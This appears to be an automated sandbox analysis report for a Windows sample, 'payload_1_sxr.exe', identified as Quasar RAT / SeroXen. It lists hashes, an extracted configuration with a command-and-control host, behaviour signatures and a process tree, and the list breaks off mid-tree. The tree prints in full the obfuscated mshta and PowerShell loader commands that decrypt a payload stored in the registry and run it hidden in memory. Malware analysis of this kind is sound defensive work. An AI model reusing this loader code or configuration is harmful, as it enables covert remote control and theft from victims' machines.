Overview

overview

10

Static

static

3

payload_1_sxr.exe

windows7-x64

10

payload_1_sxr.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    19s
  • max time network
    21s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250129-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-02-2025 21:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    payload_1_sxr.exe

  • Size

    10.3MB

  • MD5

    a0986241fcfed849a9d1dce2466840de

  • SHA1

    6e47f0378ab7c921b3c04d29aae5de1415d1aaf8

  • SHA256

    ac562299cd216585d58cab4c435c1578f3e451820a4c0feb2d902d0662645446

  • SHA512

    8e192128a7be9b6b0857a3eca1a479ed28eaae2943ae1803fdd4b523c57e106f089c6b04cfe318a757171a3e52a603d91d395f94adbf9d5d5f300b3d91311ca4

  • SSDEEP

    49152:sKxzaVKJayp/GrDlGcfk/5ZRuUtNUDrTRaDqeF5gLRyoKq6XBkim7fEM27cIgpvW:sKxzcK

Score
10/10
quasarseroxenv2.2.2 | nugetadefense_evasiondiscoveryspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.0.0.0

Botnet

v2.2.2 | NuGeta

C2

igboat.com:1167

Mutex

6a5dd02b-c4c3-4c95-8718-d851c4c1b042

Attributes
  • encryption_key

    9DE783214A7E1A7FD46C38C81B5C15C4E297596E

  • install_name

    .exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Seroxen family
    seroxen
  • Seroxen, Ser0xen

    Seroxen or SeroXen aka Ser0Xen is a trojan fist disovered in late 2022.

    trojanseroxen
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 2 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

    defense_evasion
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:316
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{0bc88a0d-5f7a-42e9-a4c0-be08d45e4cbb}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2520
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{5be00455-d9f1-40fa-be0e-3233a5081589}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4088
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{5dbaf9b4-dd3d-433e-9ce2-0be0fc842706}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2424
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:956
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:744
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:872
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1096
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1112
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1148
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2756
                        • C:\Windows\$sxr-mshta.exe
                          C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-ArapbJcqiFeDiSwKsZvE4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                          2⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Modifies registry class
                          • Suspicious use of WriteProcessMemory
                          PID:1520
                          • C:\Windows\$sxr-cmd.exe
                            "C:\Windows\$sxr-cmd.exe" /c %$sxr-ArapbJcqiFeDiSwKsZvE4312:&#<?=%
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:4672
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              4⤵
                                PID:4356
                              • C:\Windows\$sxr-powershell.exe
                                C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function WDqsH($QqiMQ){ $yfdMg=[System.Security.Cryptography.Aes]::Create(); $yfdMg.Mode=[System.Security.Cryptography.CipherMode]::CBC; $yfdMg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $yfdMg.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9mQOFJphRVclvGMalqXgUPD/WUaQ9rWRelHL4q/nlo='); $yfdMg.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4IOG3S4On+LTwmQKwhpOeA=='); $dPssD=$yfdMg.('rotpyrceDetaerC'[-1..-15] -join '')(); $vbpQn=$dPssD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QqiMQ, 0, $QqiMQ.Length); $dPssD.Dispose(); $yfdMg.Dispose(); $vbpQn;}function ZbSkn($QqiMQ){ $aDlrM=New-Object System.IO.MemoryStream(,$QqiMQ); $PbRBT=New-Object System.IO.MemoryStream; $VprFY=New-Object System.IO.Compression.GZipStream($aDlrM, [IO.Compression.CompressionMode]::Decompress); $VprFY.CopyTo($PbRBT); $VprFY.Dispose(); $aDlrM.Dispose(); $PbRBT.Dispose(); $PbRBT.ToArray();}function cEHWM($QqiMQ,$bbJgy){ $TxSfZ=[System.Reflection.Assembly]::Load([byte[]]$QqiMQ); $tpznJ=$TxSfZ.EntryPoint; $tpznJ.Invoke($null, $bbJgy);}$yfdMg1 = New-Object System.Security.Cryptography.AesManaged;$yfdMg1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$yfdMg1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$yfdMg1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9mQOFJphRVclvGMalqXgUPD/WUaQ9rWRelHL4q/nlo=');$yfdMg1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4IOG3S4On+LTwmQKwhpOeA==');$KRTqO = $yfdMg1.('rotpyrceDetaerC'[-1..-15] -join '')();$gcGOE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8n1l73NGddDdRxG42gPYiw==');$gcGOE = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE, 0, $gcGOE.Length);$gcGOE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE);$QRPDA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yGpDNlon+IGNZlDoKYh/CEYBRa4S+ZHu1B70zY9cwMA=');$QRPDA = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QRPDA, 0, $QRPDA.Length);$QRPDA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QRPDA);$GaeUG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rpm81cgQxWQeYHUZpMovqQ==');$GaeUG = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GaeUG, 0, $GaeUG.Length);$GaeUG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GaeUG);$eseMN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hUoupuHhMa4na+h2TJI0Er5Gc4kqi6sGr00/HWtfX8Be1iAlyWhtr/ObmiCu6xI5SnMUqTV6m6bwoUtMbLUtY10c8YBf6pNVSdWrzHM4pnXNzXKQ87RW7mPAAwKaunGhKVxZKkEG4xYtm99CWXDIEmqWLBWq+pXwJC9cihgZsZkfFDYobfwN0Z5xtciUZAwuyvzH60/cONCUWKrAzdP6Onkqh+zZZK2FHEPUbSyu/LnfAb4uax7uoqmEtzxZ/fW119dEan1fjkFCR79zzFDcZVYQUKiWqQqS2Ek/7qCwsuj3v515pNkWTi4TffhMgdakq6i1ZmYILogATm9MnWpE9PRpN1macB6SNTSAyN5cdpPNIn2ozbUfCnuzoDIEKsfOzpur/w7fB8G8GTAYZOwnVbj47WQDJKZeRt9vo9KqwIQ=');$eseMN = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eseMN, 0, $eseMN.Length);$eseMN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eseMN);$FuEBF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('g6uAMApUxkExGGhM4FN3ZQ==');$FuEBF = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FuEBF, 0, $FuEBF.Length);$FuEBF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FuEBF);$YsLLR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DLgOUFYtRlYOUrIuUaKKdg==');$YsLLR = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YsLLR, 0, $YsLLR.Length);$YsLLR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YsLLR);$twswF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('izHZIeNsTWReQRqAPbaMbA==');$twswF = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($twswF, 0, $twswF.Length);$twswF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($twswF);$tuAlw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GX+xpROJQFGoaxfmnJNXow==');$tuAlw = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tuAlw, 0, $tuAlw.Length);$tuAlw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tuAlw);$ZBFmj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nVLeF6i1oCz901n7Ky8b2g==');$ZBFmj = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZBFmj, 0, $ZBFmj.Length);$ZBFmj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZBFmj);$gcGOE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F3VH0Tp8k7zoccwaIE4hKQ==');$gcGOE0 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE0, 0, $gcGOE0.Length);$gcGOE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE0);$gcGOE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rF9tWOqGvlln0DPgm6Kvyg==');$gcGOE1 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE1, 0, $gcGOE1.Length);$gcGOE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE1);$gcGOE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a0pcGJ1ctfG5WTMhMOT9Zw==');$gcGOE2 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE2, 0, $gcGOE2.Length);$gcGOE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE2);$gcGOE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ndk0pwdH94NwFQHMwCgBcA==');$gcGOE3 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE3, 0, $gcGOE3.Length);$gcGOE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE3);$KRTqO.Dispose();$yfdMg1.Dispose();if (@(get-process -ea silentlycontinue $gcGOE3).count -gt 1) {exit};$SKaRD = [Microsoft.Win32.Registry]::$tuAlw.$twswF($gcGOE).$YsLLR($QRPDA);$lHaHc=[string[]]$SKaRD.Split('\');$gHUaE=ZbSkn(WDqsH([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($lHaHc[1])));cEHWM $gHUaE (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$wJhoA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($lHaHc[0]);$yfdMg = New-Object System.Security.Cryptography.AesManaged;$yfdMg.Mode = [System.Security.Cryptography.CipherMode]::CBC;$yfdMg.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$yfdMg.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9mQOFJphRVclvGMalqXgUPD/WUaQ9rWRelHL4q/nlo=');$yfdMg.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4IOG3S4On+LTwmQKwhpOeA==');$dPssD = $yfdMg.('rotpyrceDetaerC'[-1..-15] -join '')();$wJhoA = $dPssD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJhoA, 0, $wJhoA.Length);$dPssD.Dispose();$yfdMg.Dispose();$aDlrM = New-Object System.IO.MemoryStream(, $wJhoA);$PbRBT = New-Object System.IO.MemoryStream;$VprFY = New-Object System.IO.Compression.GZipStream($aDlrM, [IO.Compression.CompressionMode]::$gcGOE1);$VprFY.$ZBFmj($PbRBT);$VprFY.Dispose();$aDlrM.Dispose();$PbRBT.Dispose();$wJhoA = $PbRBT.ToArray();$mLeMR = $eseMN | IEX;$TxSfZ = $mLeMR::$gcGOE2($wJhoA);$tpznJ = $TxSfZ.EntryPoint;$tpznJ.$gcGOE0($null, (, [string[]] ($GaeUG)))
                                4⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Executes dropped EXE
                                • Hide Artifacts: Hidden Window
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of SetWindowsHookEx
                                • Suspicious use of WriteProcessMemory
                                PID:3856
                                • C:\Windows\SysWOW64\dllhost.exe
                                  C:\Windows\SysWOW64\dllhost.exe /Processid:{96e008ba-595d-4799-a9c3-886b4efca717}
                                  5⤵
                                    PID:3016
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 144
                                      6⤵
                                      • Program crash
                                      PID:3364
                                  • C:\Windows\$sxr-powershell.exe
                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3856).WaitForExit();[System.Threading.Thread]::Sleep(5000); function WDqsH($QqiMQ){ $yfdMg=[System.Security.Cryptography.Aes]::Create(); $yfdMg.Mode=[System.Security.Cryptography.CipherMode]::CBC; $yfdMg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $yfdMg.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9mQOFJphRVclvGMalqXgUPD/WUaQ9rWRelHL4q/nlo='); $yfdMg.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4IOG3S4On+LTwmQKwhpOeA=='); $dPssD=$yfdMg.('rotpyrceDetaerC'[-1..-15] -join '')(); $vbpQn=$dPssD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QqiMQ, 0, $QqiMQ.Length); $dPssD.Dispose(); $yfdMg.Dispose(); $vbpQn;}function ZbSkn($QqiMQ){ $aDlrM=New-Object System.IO.MemoryStream(,$QqiMQ); $PbRBT=New-Object System.IO.MemoryStream; $VprFY=New-Object System.IO.Compression.GZipStream($aDlrM, [IO.Compression.CompressionMode]::Decompress); $VprFY.CopyTo($PbRBT); $VprFY.Dispose(); $aDlrM.Dispose(); $PbRBT.Dispose(); $PbRBT.ToArray();}function cEHWM($QqiMQ,$bbJgy){ $TxSfZ=[System.Reflection.Assembly]::Load([byte[]]$QqiMQ); $tpznJ=$TxSfZ.EntryPoint; $tpznJ.Invoke($null, $bbJgy);}$yfdMg1 = New-Object System.Security.Cryptography.AesManaged;$yfdMg1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$yfdMg1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$yfdMg1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9mQOFJphRVclvGMalqXgUPD/WUaQ9rWRelHL4q/nlo=');$yfdMg1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4IOG3S4On+LTwmQKwhpOeA==');$KRTqO = $yfdMg1.('rotpyrceDetaerC'[-1..-15] -join '')();$gcGOE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8n1l73NGddDdRxG42gPYiw==');$gcGOE = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE, 0, $gcGOE.Length);$gcGOE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE);$QRPDA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yGpDNlon+IGNZlDoKYh/CEYBRa4S+ZHu1B70zY9cwMA=');$QRPDA = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QRPDA, 0, $QRPDA.Length);$QRPDA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QRPDA);$GaeUG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rpm81cgQxWQeYHUZpMovqQ==');$GaeUG = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GaeUG, 0, $GaeUG.Length);$GaeUG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GaeUG);$eseMN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hUoupuHhMa4na+h2TJI0Er5Gc4kqi6sGr00/HWtfX8Be1iAlyWhtr/ObmiCu6xI5SnMUqTV6m6bwoUtMbLUtY10c8YBf6pNVSdWrzHM4pnXNzXKQ87RW7mPAAwKaunGhKVxZKkEG4xYtm99CWXDIEmqWLBWq+pXwJC9cihgZsZkfFDYobfwN0Z5xtciUZAwuyvzH60/cONCUWKrAzdP6Onkqh+zZZK2FHEPUbSyu/LnfAb4uax7uoqmEtzxZ/fW119dEan1fjkFCR79zzFDcZVYQUKiWqQqS2Ek/7qCwsuj3v515pNkWTi4TffhMgdakq6i1ZmYILogATm9MnWpE9PRpN1macB6SNTSAyN5cdpPNIn2ozbUfCnuzoDIEKsfOzpur/w7fB8G8GTAYZOwnVbj47WQDJKZeRt9vo9KqwIQ=');$eseMN = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eseMN, 0, $eseMN.Length);$eseMN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eseMN);$FuEBF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('g6uAMApUxkExGGhM4FN3ZQ==');$FuEBF = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FuEBF, 0, $FuEBF.Length);$FuEBF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FuEBF);$YsLLR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DLgOUFYtRlYOUrIuUaKKdg==');$YsLLR = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YsLLR, 0, $YsLLR.Length);$YsLLR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YsLLR);$twswF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('izHZIeNsTWReQRqAPbaMbA==');$twswF = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($twswF, 0, $twswF.Length);$twswF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($twswF);$tuAlw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GX+xpROJQFGoaxfmnJNXow==');$tuAlw = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tuAlw, 0, $tuAlw.Length);$tuAlw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tuAlw);$ZBFmj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nVLeF6i1oCz901n7Ky8b2g==');$ZBFmj = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZBFmj, 0, $ZBFmj.Length);$ZBFmj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZBFmj);$gcGOE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F3VH0Tp8k7zoccwaIE4hKQ==');$gcGOE0 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE0, 0, $gcGOE0.Length);$gcGOE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE0);$gcGOE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rF9tWOqGvlln0DPgm6Kvyg==');$gcGOE1 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE1, 0, $gcGOE1.Length);$gcGOE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE1);$gcGOE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a0pcGJ1ctfG5WTMhMOT9Zw==');$gcGOE2 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE2, 0, $gcGOE2.Length);$gcGOE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE2);$gcGOE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ndk0pwdH94NwFQHMwCgBcA==');$gcGOE3 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE3, 0, $gcGOE3.Length);$gcGOE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE3);$KRTqO.Dispose();$yfdMg1.Dispose();if (@(get-process -ea silentlycontinue $gcGOE3).count -gt 1) {exit};$SKaRD = [Microsoft.Win32.Registry]::$tuAlw.$twswF($gcGOE).$YsLLR($QRPDA);$lHaHc=[string[]]$SKaRD.Split('\');$gHUaE=ZbSkn(WDqsH([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($lHaHc[1])));cEHWM $gHUaE (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$wJhoA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($lHaHc[0]);$yfdMg = New-Object System.Security.Cryptography.AesManaged;$yfdMg.Mode = [System.Security.Cryptography.CipherMode]::CBC;$yfdMg.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$yfdMg.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9mQOFJphRVclvGMalqXgUPD/WUaQ9rWRelHL4q/nlo=');$yfdMg.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4IOG3S4On+LTwmQKwhpOeA==');$dPssD = $yfdMg.('rotpyrceDetaerC'[-1..-15] -join '')();$wJhoA = $dPssD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJhoA, 0, $wJhoA.Length);$dPssD.Dispose();$yfdMg.Dispose();$aDlrM = New-Object System.IO.MemoryStream(, $wJhoA);$PbRBT = New-Object System.IO.MemoryStream;$VprFY = New-Object System.IO.Compression.GZipStream($aDlrM, [IO.Compression.CompressionMode]::$gcGOE1);$VprFY.$ZBFmj($PbRBT);$VprFY.Dispose();$aDlrM.Dispose();$PbRBT.Dispose();$wJhoA = $PbRBT.ToArray();$mLeMR = $eseMN | IEX;$TxSfZ = $mLeMR::$gcGOE2($wJhoA);$tpznJ = $TxSfZ.EntryPoint;$tpznJ.$gcGOE0($null, (, [string[]] ($GaeUG)))
                                    5⤵
                                    • Executes dropped EXE
                                    • Hide Artifacts: Hidden Window
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4752
                                  • C:\Windows\SysWOW64\dllhost.exe
                                    C:\Windows\SysWOW64\dllhost.exe /Processid:{027be6a5-3dda-456c-9702-b04acd417683}
                                    5⤵
                                      PID:4876
                                    • C:\Windows\SysWOW64\dllhost.exe
                                      C:\Windows\SysWOW64\dllhost.exe /Processid:{10d49aad-0aaa-4db4-83f5-6f3f8d28f62c}
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:212
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                              1⤵
                                PID:1160
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                1⤵
                                  PID:1272
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                  1⤵
                                    PID:1296
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                    1⤵
                                      PID:1368
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                      1⤵
                                        PID:1388
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                        1⤵
                                          PID:1504
                                          • C:\Windows\system32\sihost.exe
                                            sihost.exe
                                            2⤵
                                              PID:2604
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                            1⤵
                                              PID:1568
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                              1⤵
                                                PID:1588
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                1⤵
                                                  PID:1596
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                  1⤵
                                                    PID:1704
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                    1⤵
                                                      PID:1748
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                      1⤵
